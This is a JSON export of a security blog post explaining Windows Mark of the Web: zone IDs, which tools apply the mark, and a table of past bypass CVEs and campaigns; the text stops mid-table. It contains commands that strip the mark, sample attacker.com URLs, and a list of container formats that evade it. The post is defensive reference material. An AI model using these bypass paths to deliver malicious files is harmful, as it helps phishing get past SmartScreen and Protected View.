{"id":280,"date":"2026-03-08T05:08:49","date_gmt":"2026-03-08T05:08:49","guid":{"rendered":"https:\/\/racrx.io\/?p=280"},"modified":"2026-03-08T05:17:42","modified_gmt":"2026-03-08T05:17:42","slug":"mark-of-the-web-motw-details","status":"publish","type":"post","link":"https:\/\/racrx.io\/?p=280","title":{"rendered":"Mark of the Web (MoTW) Details"},"content":{"rendered":"\n<style>\n.motw-article {\n  font-family: 'Georgia', 'Times New Roman', serif;\n  color: #1a1a2e;\n  max-width: 860px;\n  margin: 0 auto;\n  line-height: 1.75;\n  font-size: 17px;\n}\n.motw-article * { box-sizing: border-box; }\n\n\/* \u2500\u2500 Hero \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 *\/\n.motw-hero {\n  background: linear-gradient(135deg, #0d1b2a 0%, #1a3a5c 50%, #0d1b2a 100%);\n  border-radius: 12px;\n  padding: 56px 48px;\n  margin-bottom: 48px;\n  position: relative;\n  overflow: hidden;\n}\n.motw-hero::before {\n  content: '';\n  position: absolute;\n  top: -60px; right: -60px;\n  width: 240px; height: 240px;\n  background: radial-gradient(circle, rgba(0,180,255,0.12) 0%, transparent 70%);\n  border-radius: 50%;\n}\n.motw-hero::after {\n  content: '';\n  position: absolute;\n  bottom: -40px; left: -40px;\n  width: 180px; height: 180px;\n  background: radial-gradient(circle, rgba(220,50,50,0.10) 0%, transparent 70%);\n  border-radius: 50%;\n}\n.motw-hero-tag {\n  display: inline-block;\n  background: rgba(0,180,255,0.15);\n  border: 1px solid rgba(0,180,255,0.35);\n  color: #60cfff;\n  font-family: 'Courier New', monospace;\n  font-size: 12px;\n  letter-spacing: 2px;\n  text-transform: uppercase;\n  padding: 4px 14px;\n  border-radius: 20px;\n  margin-bottom: 20px;\n}\n.motw-hero h1 {\n  font-family: 'Georgia', serif;\n  color: #ffffff;\n  font-size: 46px;\n  font-weight: 900;\n  line-height: 1.1;\n  margin: 0 0 16px 0;\n  letter-spacing: -1px;\n}\n.motw-hero h1 span { color: #60cfff; }\n.motw-hero-sub {\n  color: #a0b8d0;\n  font-size: 18px;\n  margin: 0 0 28px 0;\n  font-style: italic;\n  line-height: 1.5;\n}\n.motw-hero-meta {\n  display: flex;\n  gap: 24px;\n  flex-wrap: wrap;\n}\n.motw-hero-meta span {\n  font-family: 'Courier New', monospace;\n  font-size: 12px;\n  color: #607080;\n  letter-spacing: 1px;\n}\n.motw-hero-meta span::before { content: '\u25b8 '; color: #60cfff; }\n\n\/* \u2500\u2500 Typography \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 *\/\n.motw-article p {\n  margin: 0 0 20px 0;\n  color: #2c3e50;\n}\n.motw-article strong { color: #1a3a5c; }\n.motw-article code {\n  font-family: 'Courier New', monospace;\n  font-size: 14px;\n  background: #eef2f7;\n  color: #1a3a5c;\n  padding: 2px 7px;\n  border-radius: 4px;\n  border: 1px solid #d0dae8;\n}\n\n\/* \u2500\u2500 Section Headers \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 *\/\n.motw-h2 {\n  font-family: 'Georgia', serif;\n  font-size: 28px;\n  font-weight: 900;\n  color: #0d1b2a;\n  margin: 52px 0 20px 0;\n  padding-bottom: 12px;\n  border-bottom: 3px solid #1a3a5c;\n  letter-spacing: -0.5px;\n  line-height: 1.2;\n}\n.motw-h2 .section-num {\n  color: #60cfff;\n  font-family: 'Courier New', monospace;\n  font-size: 16px;\n  font-weight: normal;\n  margin-right: 10px;\n}\n.motw-h3 {\n  font-family: 'Georgia', serif;\n  font-size: 20px;\n  font-weight: 700;\n  color: #1a3a5c;\n  margin: 36px 0 14px 0;\n  padding-left: 14px;\n  border-left: 4px solid #60cfff;\n  line-height: 1.3;\n}\n.motw-h3.red { border-left-color: #c0392b; color: #7b1f1f; }\n\n\/* \u2500\u2500 Code Blocks \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 *\/\n.motw-code {\n  background: #0d1117 !important;\n  border: 1px solid #30363d !important;\n  border-radius: 10px !important;\n  margin: 24px 0 !important;\n  overflow: hidden !important;\n}\n.motw-code-header {\n  background: #161b22 !important;\n  padding: 8px 18px !important;\n  display: flex !important;\n  align-items: center !important;\n  gap: 8px !important;\n  border-bottom: 1px solid #30363d !important;\n}\n.motw-code-header span {\n  font-family: 'Courier New', monospace !important;\n  font-size: 12px !important;\n  color: #8b949e !important;\n  letter-spacing: 0.5px !important;\n}\n.motw-code-dot { width: 12px !important; height: 12px !important; border-radius: 50% !important; display: inline-block !important; }\n.dot-r { background: #ff5f57 !important; }\n.dot-y { background: #ffbd2e !important; }\n.dot-g { background: #28c840 !important; }\n.motw-code pre {\n  margin: 0 !important;\n  padding: 20px 22px !important;\n  overflow-x: auto !important;\n  font-family: 'Courier New', monospace !important;\n  font-size: 13px !important;\n  line-height: 1.7 !important;\n  color: #00ff41 !important;\n  white-space: pre !important;\n  background: #0d1117 !important;\n  border: none !important;\n  border-radius: 0 !important;\n  box-shadow: none !important;\n}\n.motw-code pre .comment { color: #8b949e !important; }\n.motw-code pre .keyword { color: #ff7b72 !important; }\n.motw-code pre .string  { color: #a5d6ff !important; }\n.motw-code pre .label   { color: #ffa657 !important; }\n\n\/* \u2500\u2500 Info Boxes \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 *\/\n.motw-box {\n  border-radius: 10px;\n  margin: 28px 0;\n  overflow: hidden;\n}\n.motw-box-header {\n  padding: 11px 20px;\n  font-family: 'Courier New', monospace;\n  font-size: 13px;\n  font-weight: 700;\n  letter-spacing: 1px;\n  color: #fff;\n}\n.motw-box-body { padding: 16px 20px; }\n.motw-box-body p { margin: 0 0 8px 0; font-size: 15px; }\n.motw-box-body p:last-child { margin: 0; }\n.motw-box-body p::before { content: '\u25b8 '; opacity: 0.6; }\n\n.box-blue .motw-box-header  { background: #1a3a5c; }\n.box-blue .motw-box-body    { background: #eef4fb; border: 1px solid #b8d0e8; border-top: none; color: #1a3a5c; }\n.box-red  .motw-box-header  { background: #7b1f1f; }\n.box-red  .motw-box-body    { background: #fdf2f2; border: 1px solid #e8b8b8; border-top: none; color: #4a1515; }\n.box-warn .motw-box-header  { background: #7d5a00; }\n.box-warn .motw-box-body    { background: #fef9ec; border: 1px solid #e8d88a; border-top: none; color: #4a3800; }\n.box-green .motw-box-header { background: #1a5c2a; }\n.box-green .motw-box-body   { background: #f0faf2; border: 1px solid #a8d8b0; border-top: none; color: #1a3a20; }\n\n\/* \u2500\u2500 Tables \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 *\/\n.motw-table-wrap { overflow-x: auto; margin: 24px 0; }\n.motw-table {\n  width: 100%;\n  border-collapse: collapse;\n  font-size: 15px;\n}\n.motw-table thead tr { background: #0d1b2a; }\n.motw-table thead th {\n  color: #fff;\n  font-family: 'Courier New', monospace;\n  font-size: 13px;\n  font-weight: 600;\n  padding: 12px 16px;\n  text-align: left;\n  letter-spacing: 0.5px;\n  border: 1px solid #1a3a5c;\n}\n.motw-table tbody tr:nth-child(odd)  { background: #f7f9fc; }\n.motw-table tbody tr:nth-child(even) { background: #ffffff; }\n.motw-table tbody tr:hover { background: #eef4fb; }\n.motw-table tbody td {\n  padding: 10px 16px;\n  border: 1px solid #d8e4ef;\n  color: #2c3e50;\n  vertical-align: top;\n  line-height: 1.5;\n}\n.motw-table .highlight { color: #c0392b; font-weight: 600; }\n.motw-table .ok { color: #1a7a3a; font-weight: 600; }\n\n\/* \u2500\u2500 Bullet Lists \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 *\/\n.motw-list {\n  margin: 12px 0 20px 0;\n  padding-left: 0;\n  list-style: none;\n}\n.motw-list li {\n  padding: 5px 0 5px 24px;\n  position: relative;\n  color: #2c3e50;\n  font-size: 16px;\n}\n.motw-list li::before {\n  content: '\u25b8';\n  position: absolute;\n  left: 0;\n  color: #60cfff;\n  font-size: 12px;\n  top: 8px;\n}\n\n\/* \u2500\u2500 CVE \/ Reference Tags \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 *\/\n.cve-tag {\n  display: inline-block;\n  background: #fdf2f2;\n  border: 1px solid #e8b8b8;\n  color: #7b1f1f;\n  font-family: 'Courier New', monospace;\n  font-size: 12px;\n  padding: 2px 8px;\n  border-radius: 4px;\n  margin: 2px 2px;\n  font-weight: 600;\n}\n.mitre-tag {\n  display: inline-block;\n  background: #eef4fb;\n  border: 1px solid #b8d0e8;\n  color: #1a3a5c;\n  font-family: 'Courier New', monospace;\n  font-size: 12px;\n  padding: 2px 8px;\n  border-radius: 4px;\n  margin: 2px 2px;\n  font-weight: 600;\n}\n\n\/* \u2500\u2500 Divider \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 *\/\n.motw-divider {\n  border: none;\n  border-top: 2px solid #e0e8f0;\n  margin: 48px 0;\n}\n.motw-end {\n  text-align: center;\n  color: #8090a0;\n  font-family: 'Courier New', monospace;\n  font-size: 13px;\n  letter-spacing: 2px;\n  margin: 40px 0 0 0;\n}\n<\/style>\n\n<div class=\"motw-article\">\n\n  <!-- SECTION 1 -->\n  <h2 class=\"motw-h2\"><span class=\"section-num\">01 \/\/<\/span> What Is Mark of the Web?<\/h2>\n\n  <p>Mark of the Web is a Windows security feature that dates to Internet Explorer 6 and has evolved into one of the most critical gatekeeping mechanisms in the modern Windows security model. At its core, MoTW is a simple concept: when a file arrives from an untrusted source, a browser download, an email attachment, or a file transfer from the internet, Windows stamps that file with metadata indicating its origin.<\/p>\n\n  <p>This stamp takes the form of an <strong>NTFS Alternate Data Stream (ADS)<\/strong> named <code>Zone.Identifier<\/code>, attached to the file on disk. The stream contains a <code>[ZoneTransfer]<\/code> block that records the Zone ID, referrer URL, and host URL. This tiny piece of metadata then drives downstream security decisions across the entire Windows ecosystem, from SmartScreen and UAC to Office Protected View and Windows Defender Application Control (WDAC).<\/p>\n\n  <h3 class=\"motw-h3\">1.1 \u2014 The Zone.Identifier Stream<\/h3>\n  <p>The actual on-disk format of MoTW is straightforward. Here is what the stream looks like when inspected via PowerShell:<\/p>\n\n  <div class=\"motw-code\">\n    <div class=\"motw-code-header\">\n      <div class=\"motw-code-dot dot-r\"><\/div>\n      <div class=\"motw-code-dot dot-y\"><\/div>\n      <div class=\"motw-code-dot dot-g\"><\/div>\n      <span>PowerShell \u2014 Inspect Zone.Identifier ADS<\/span>\n    <\/div>\n    <pre>\n<span class=\"label\">PS C:\\Users\\Analyst&gt;<\/span> Get-Item .\\payload.docm -Stream *\n\nPSPath       : Microsoft.PowerShell.Core\\FileSystem::C:\\payload.docm\nPSChildName  : payload.docm::$DATA\nLength       : 28672\n\nPSChildName  : payload.docm:Zone.Identifier\nLength       : 123\n\n<span class=\"label\">PS C:\\Users\\Analyst&gt;<\/span> Get-Content .\\payload.docm -Stream Zone.Identifier\n[ZoneTransfer]\nZoneId=3\nReferrerUrl=https:\/\/attacker.com\/payload.docm\nHostUrl=https:\/\/attacker.com\/payload.docm<\/pre>\n  <\/div>\n\n  <h3 class=\"motw-h3\">1.2 \u2014 Zone IDs: The Full Reference<\/h3>\n  <p>The ZoneId value maps to one of five Internet Security Zones defined in Windows. Zone 3 is the critical value that triggers all downstream restrictions:<\/p>\n\n  <div class=\"motw-code\">\n    <div class=\"motw-code-header\">\n      <div class=\"motw-code-dot dot-r\"><\/div>\n      <div class=\"motw-code-dot dot-y\"><\/div>\n      <div class=\"motw-code-dot dot-g\"><\/div>\n      <span>Zone ID Reference<\/span>\n    <\/div>\n    <pre>\n  \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n  \u2502 ZoneId=0 \u2502 Local Machine (My Computer)                 \u2502\n  \u2502 ZoneId=1 \u2502 Local Intranet                              \u2502\n  \u2502 ZoneId=2 \u2502 Trusted Sites                               \u2502\n  \u2502 ZoneId=3 \u2502 Internet  \u25c4\u2500\u2500 MoTW applied here             \u2502\n  \u2502 ZoneId=4 \u2502 Restricted Sites                            \u2502\n  \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<\/pre>\n  <\/div>\n\n  <p>Zone 0 files are treated as if they originated locally as no restrictions apply. Zone 2 and Zone 1 receive lighter treatment. Only <strong>Zone 3<\/strong> triggers the full SmartScreen + Protected View + UAC stack.<\/p>\n\n  <!-- SECTION 2 -->\n  <h2 class=\"motw-h2\"><span class=\"section-num\">02 \/\/<\/span> How MoTW Gets Applied<\/h2>\n\n  <p>MoTW is applied at the point of file creation or download. Multiple Windows components are responsible for writing the Zone.Identifier stream depending on how the file entered the system:<\/p>\n\n  <div class=\"motw-table-wrap\">\n    <table class=\"motw-table\">\n      <thead>\n        <tr>\n          <th>Source \/ Mechanism<\/th>\n          <th>MoTW Applied By<\/th>\n        <\/tr>\n      <\/thead>\n      <tbody>\n        <tr><td>Browser download (Chrome, Edge, Firefox)<\/td><td>Browser via IAttachmentExecute COM API<\/td><\/tr>\n        <tr><td>Outlook email attachment saved to disk<\/td><td>Outlook \/ Windows Shell<\/td><\/tr>\n        <tr><td>ZIP extraction (Windows Explorer)<\/td><td>Explorer (Win11 22H2+ propagates to contents)<\/td><\/tr>\n        <tr><td>ISO \/ VHD mount (Windows Explorer)<\/td><td>Explorer applies to container only<\/td><\/tr>\n        <tr><td>curl \/ wget (PowerShell)<\/td><td>PowerShell 3.0+ via IAttachmentExecute<\/td><\/tr>\n        <tr><td>SMB \/ UNC file copy<\/td><td class=\"highlight\">NOT applied \u2014 network share bypass<\/td><\/tr>\n        <tr><td>USB \/ physical media<\/td><td class=\"highlight\">NOT applied \u2014 local filesystem<\/td><\/tr>\n        <tr><td>7-Zip \/ WinRAR extraction<\/td><td class=\"highlight\">NOT propagated \u2014 third-party tools bypass<\/td><\/tr>\n      <\/tbody>\n    <\/table>\n  <\/div>\n\n  <h3 class=\"motw-h3\">2.1 \u2014 The Propagation Problem<\/h3>\n  <p>A critical and historically exploited nuance: MoTW is applied to the <strong>container<\/strong> (the ZIP, ISO, etc.) but not necessarily propagated to its contents when extracted. Microsoft patched ZIP propagation in Windows 11 22H2 (October 2022), but the following container types <strong>still do not propagate MoTW<\/strong> to their extracted contents as of 2026:<\/p>\n\n  <ul class=\"motw-list\">\n    <li>ISO disk images (.iso)<\/li>\n    <li>.img files<\/li>\n    <li>Virtual hard disks (.vhd \/ .vhdx)<\/li>\n    <li>7-Zip archives extracted via 7z.exe or 7-Zip GUI<\/li>\n    <li>WinRAR archives (prior to patched versions)<\/li>\n  <\/ul>\n\n  <!-- SECTION 3 -->\n  <h2 class=\"motw-h2\"><span class=\"section-num\">03 \/\/<\/span> How Windows Consumes MoTW<\/h2>\n\n  <p>MoTW is not a standalone control, it is an input that feeds multiple security subsystems. Understanding each consumer is essential for both defenders and red teamers.<\/p>\n\n  <h3 class=\"motw-h3\">3.1 \u2014 SmartScreen Application Reputation<\/h3>\n  <p>Windows SmartScreen checks ZoneId=3 files against Microsoft&#8217;s cloud reputation database before execution. Unsigned or low-reputation binaries receive a blocking warning. Signed files from well-established publishers may pass silently. <strong>Without MoTW, SmartScreen does not trigger at all.<\/strong><\/p>\n\n  <h3 class=\"motw-h3\">3.2 \u2014 Microsoft Office Protected View<\/h3>\n  <p>Office documents with MoTW open in Protected View, a sandboxed rendering environment where macros are completely disabled:<\/p>\n\n  <div class=\"motw-code\">\n    <div class=\"motw-code-header\">\n      <div class=\"motw-code-dot dot-r\"><\/div>\n      <div class=\"motw-code-dot dot-y\"><\/div>\n      <div class=\"motw-code-dot dot-g\"><\/div>\n      <span>Microsoft Word \u2014 Protected View Dialog<\/span>\n    <\/div>\n    <pre>\n  \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n  \u2502  Microsoft Word \u2014 Protected View                               \u2502\n  \u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n  \u2502  \u26a0  PROTECTED VIEW  Be careful. Files from the Internet can    \u2502\n  \u2502     contain viruses. Unless you need to edit, it's safer to    \u2502\n  \u2502     stay in Protected View.  [ Enable Editing ]                \u2502\n  \u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n  \u2502  (document content rendered read-only, macros DISABLED)        \u2502\n  \u2502                                                                \u2502\n  \u2502  [Macro content blocked \u2014 Zone.Identifier ZoneId=3 detected]  \u2502\n  \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<\/pre>\n  <\/div>\n\n  <p>Protected View is specifically triggered by ZoneId=3. A document <em>without<\/em> MoTW opens in full edit mode with macro execution available. This is precisely why container-based bypasses were so effective for phishing campaigns delivering malicious Office documents.<\/p>\n\n  <h3 class=\"motw-h3\">3.3 \u2014 User Account Control (UAC)<\/h3>\n  <p>Executables with MoTW that request elevation receive additional friction: the UAC dialog displays &#8220;Unknown Publisher&#8221; in amber\/orange rather than the standard prompt. This creates social engineering friction for attackers delivering signed but low-reputation binaries.<\/p>\n\n  <h3 class=\"motw-h3\">3.4 \u2014 The Full MoTW Decision Flow<\/h3>\n\n  <div class=\"motw-code\">\n    <div class=\"motw-code-header\">\n      <div class=\"motw-code-dot dot-r\"><\/div>\n      <div class=\"motw-code-dot dot-y\"><\/div>\n      <div class=\"motw-code-dot dot-g\"><\/div>\n      <span>MoTW Security Decision Flow<\/span>\n    <\/div>\n    <pre>\n  INTERNET \/ UNTRUSTED SOURCE\n  \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n  \u2502  Browser Download  \u2502  Email Attachment  \u2502  USB\/ISO      \u2502\n  \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n             \u2502                  \u2502           \u2502\n             \u25bc                  \u25bc           \u25bc\n  \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n  \u2502            NTFS Alternate Data Stream                   \u2502\n  \u2502         Zone.Identifier  :$DATA                         \u2502\n  \u2502                                                         \u2502\n  \u2502   [ZoneTransfer]                                        \u2502\n  \u2502   ZoneId=3                                              \u2502\n  \u2502   ReferrerUrl=https:\/\/attacker.com\/payload.zip          \u2502\n  \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n             \u2502\n             \u25bc\n  \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n  \u2502              Windows Security Checks                    \u2502\n  \u2502                                                         \u2502\n  \u2502   SmartScreen \u2500\u2500\u25ba File Reputation Check                 \u2502\n  \u2502   UAC Prompt  \u2500\u2500\u25ba \"Unknown Publisher\" warning           \u2502\n  \u2502   Office      \u2500\u2500\u25ba Protected View (macros disabled)      \u2502\n  \u2502   Mark of Web \u2500\u2500\u25ba Applied to extracted archive contents \u2502\n  \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<\/pre>\n  <\/div>\n\n  <!-- SECTION 4 -->\n  <h2 class=\"motw-h2\"><span class=\"section-num\">04 \/\/<\/span> Inspecting MoTW \u2014 Analyst Reference<\/h2>\n\n  <h3 class=\"motw-h3\">4.1 \u2014 PowerShell Commands<\/h3>\n  <div class=\"motw-code\">\n    <div class=\"motw-code-header\">\n      <div class=\"motw-code-dot dot-r\"><\/div>\n      <div class=\"motw-code-dot dot-y\"><\/div>\n      <div class=\"motw-code-dot dot-g\"><\/div>\n      <span>PowerShell \u2014 MoTW Inspection &amp; Removal<\/span>\n    <\/div>\n    <pre>\n<span class=\"comment\"># Check if a file has MoTW<\/span>\nGet-Item .\\payload.docm -Stream *\n\n<span class=\"comment\"># Read the Zone.Identifier content<\/span>\nGet-Content .\\payload.docm -Stream Zone.Identifier\n\n<span class=\"comment\"># Remove MoTW (Unblock-File)<\/span>\nUnblock-File -Path .\\payload.docm\n\n<span class=\"comment\"># Bulk check \u2014 find all MoTW-tagged files in a directory<\/span>\nGet-ChildItem C:\\Users\\User\\Downloads -Recurse |\n  Where-Object { (Get-Item $_.FullName -Stream * |\n  Select-Object -ExpandProperty Stream) -contains 'Zone.Identifier' }<\/pre>\n  <\/div>\n\n  <h3 class=\"motw-h3\">4.2 \u2014 Sysinternals Streams<\/h3>\n  <div class=\"motw-code\">\n    <div class=\"motw-code-header\">\n      <div class=\"motw-code-dot dot-r\"><\/div>\n      <div class=\"motw-code-dot dot-y\"><\/div>\n      <div class=\"motw-code-dot dot-g\"><\/div>\n      <span>Sysinternals streams.exe<\/span>\n    <\/div>\n    <pre>\n<span class=\"comment\"># Sysinternals Streams utility \u2014 enumerate all ADS<\/span>\nstreams.exe -s C:\\Users\\User\\Downloads\\\n\n<span class=\"comment\"># Output example:<\/span>\nC:\\Users\\User\\Downloads\\payload.iso:\n   :Zone.Identifier:$DATA    127\n\n<span class=\"comment\"># Remove all ADS (including MoTW) from a file<\/span>\nstreams.exe -d payload.iso<\/pre>\n  <\/div>\n\n  <!-- SECTION 5 -->\n  <h2 class=\"motw-h2\"><span class=\"section-num\">05 \/\/<\/span> Real-World Exploitation History<\/h2>\n\n  <p>MoTW bypasses have been central to some of the most impactful phishing and initial access campaigns in recent years. The following CVEs and threat actor patterns demonstrate how pervasive this abuse has become:<\/p>\n\n  <div class=\"motw-table-wrap\">\n    <table class=\"motw-table\">\n      <thead>\n        <tr>\n          <th>CVE \/ Campaign<\/th>\n          <th>Bypass Technique<\/th>\n        <\/tr>\n      <\/thead>\n      <tbody>\n        <tr><td><span class=\"cve-tag\">CVE-2022-41049<\/span> Windows<\/td><td>ZIP files did not propagate MoTW to extracted files (patched Oct 2022)<\/td><\/tr>\n        <tr><td><span class=\"cve-tag\">CVE-2022-44698<\/span> SmartScreen<\/td><td>Crafted .url files with UNC handler bypassed MoTW SmartScreen check<\/td><\/tr>\n        <tr><td><span class=\"cve-tag\">CVE-2023-24880<\/span> SmartScreen<\/td><td>Malformed Authenticode signature bypassed SmartScreen on MoTW files<\/td><\/tr>\n        <tr><td>Qakbot \/ QBot (2022)<\/td><td>ISO + LNK delivery \u2014 ISO MoTW not propagated to embedded LNK<\/td><\/tr>\n        <tr><td>Emotet (2022 revival)<\/td><td>XLS attachments in ISO containers to bypass Protected View<\/td><\/tr>\n        <tr><td>Magniber Ransomware<\/td><td>Malformed .appx and .msix files bypassed SmartScreen MoTW checks<\/td><\/tr>\n        <tr><td>TA570 \/ 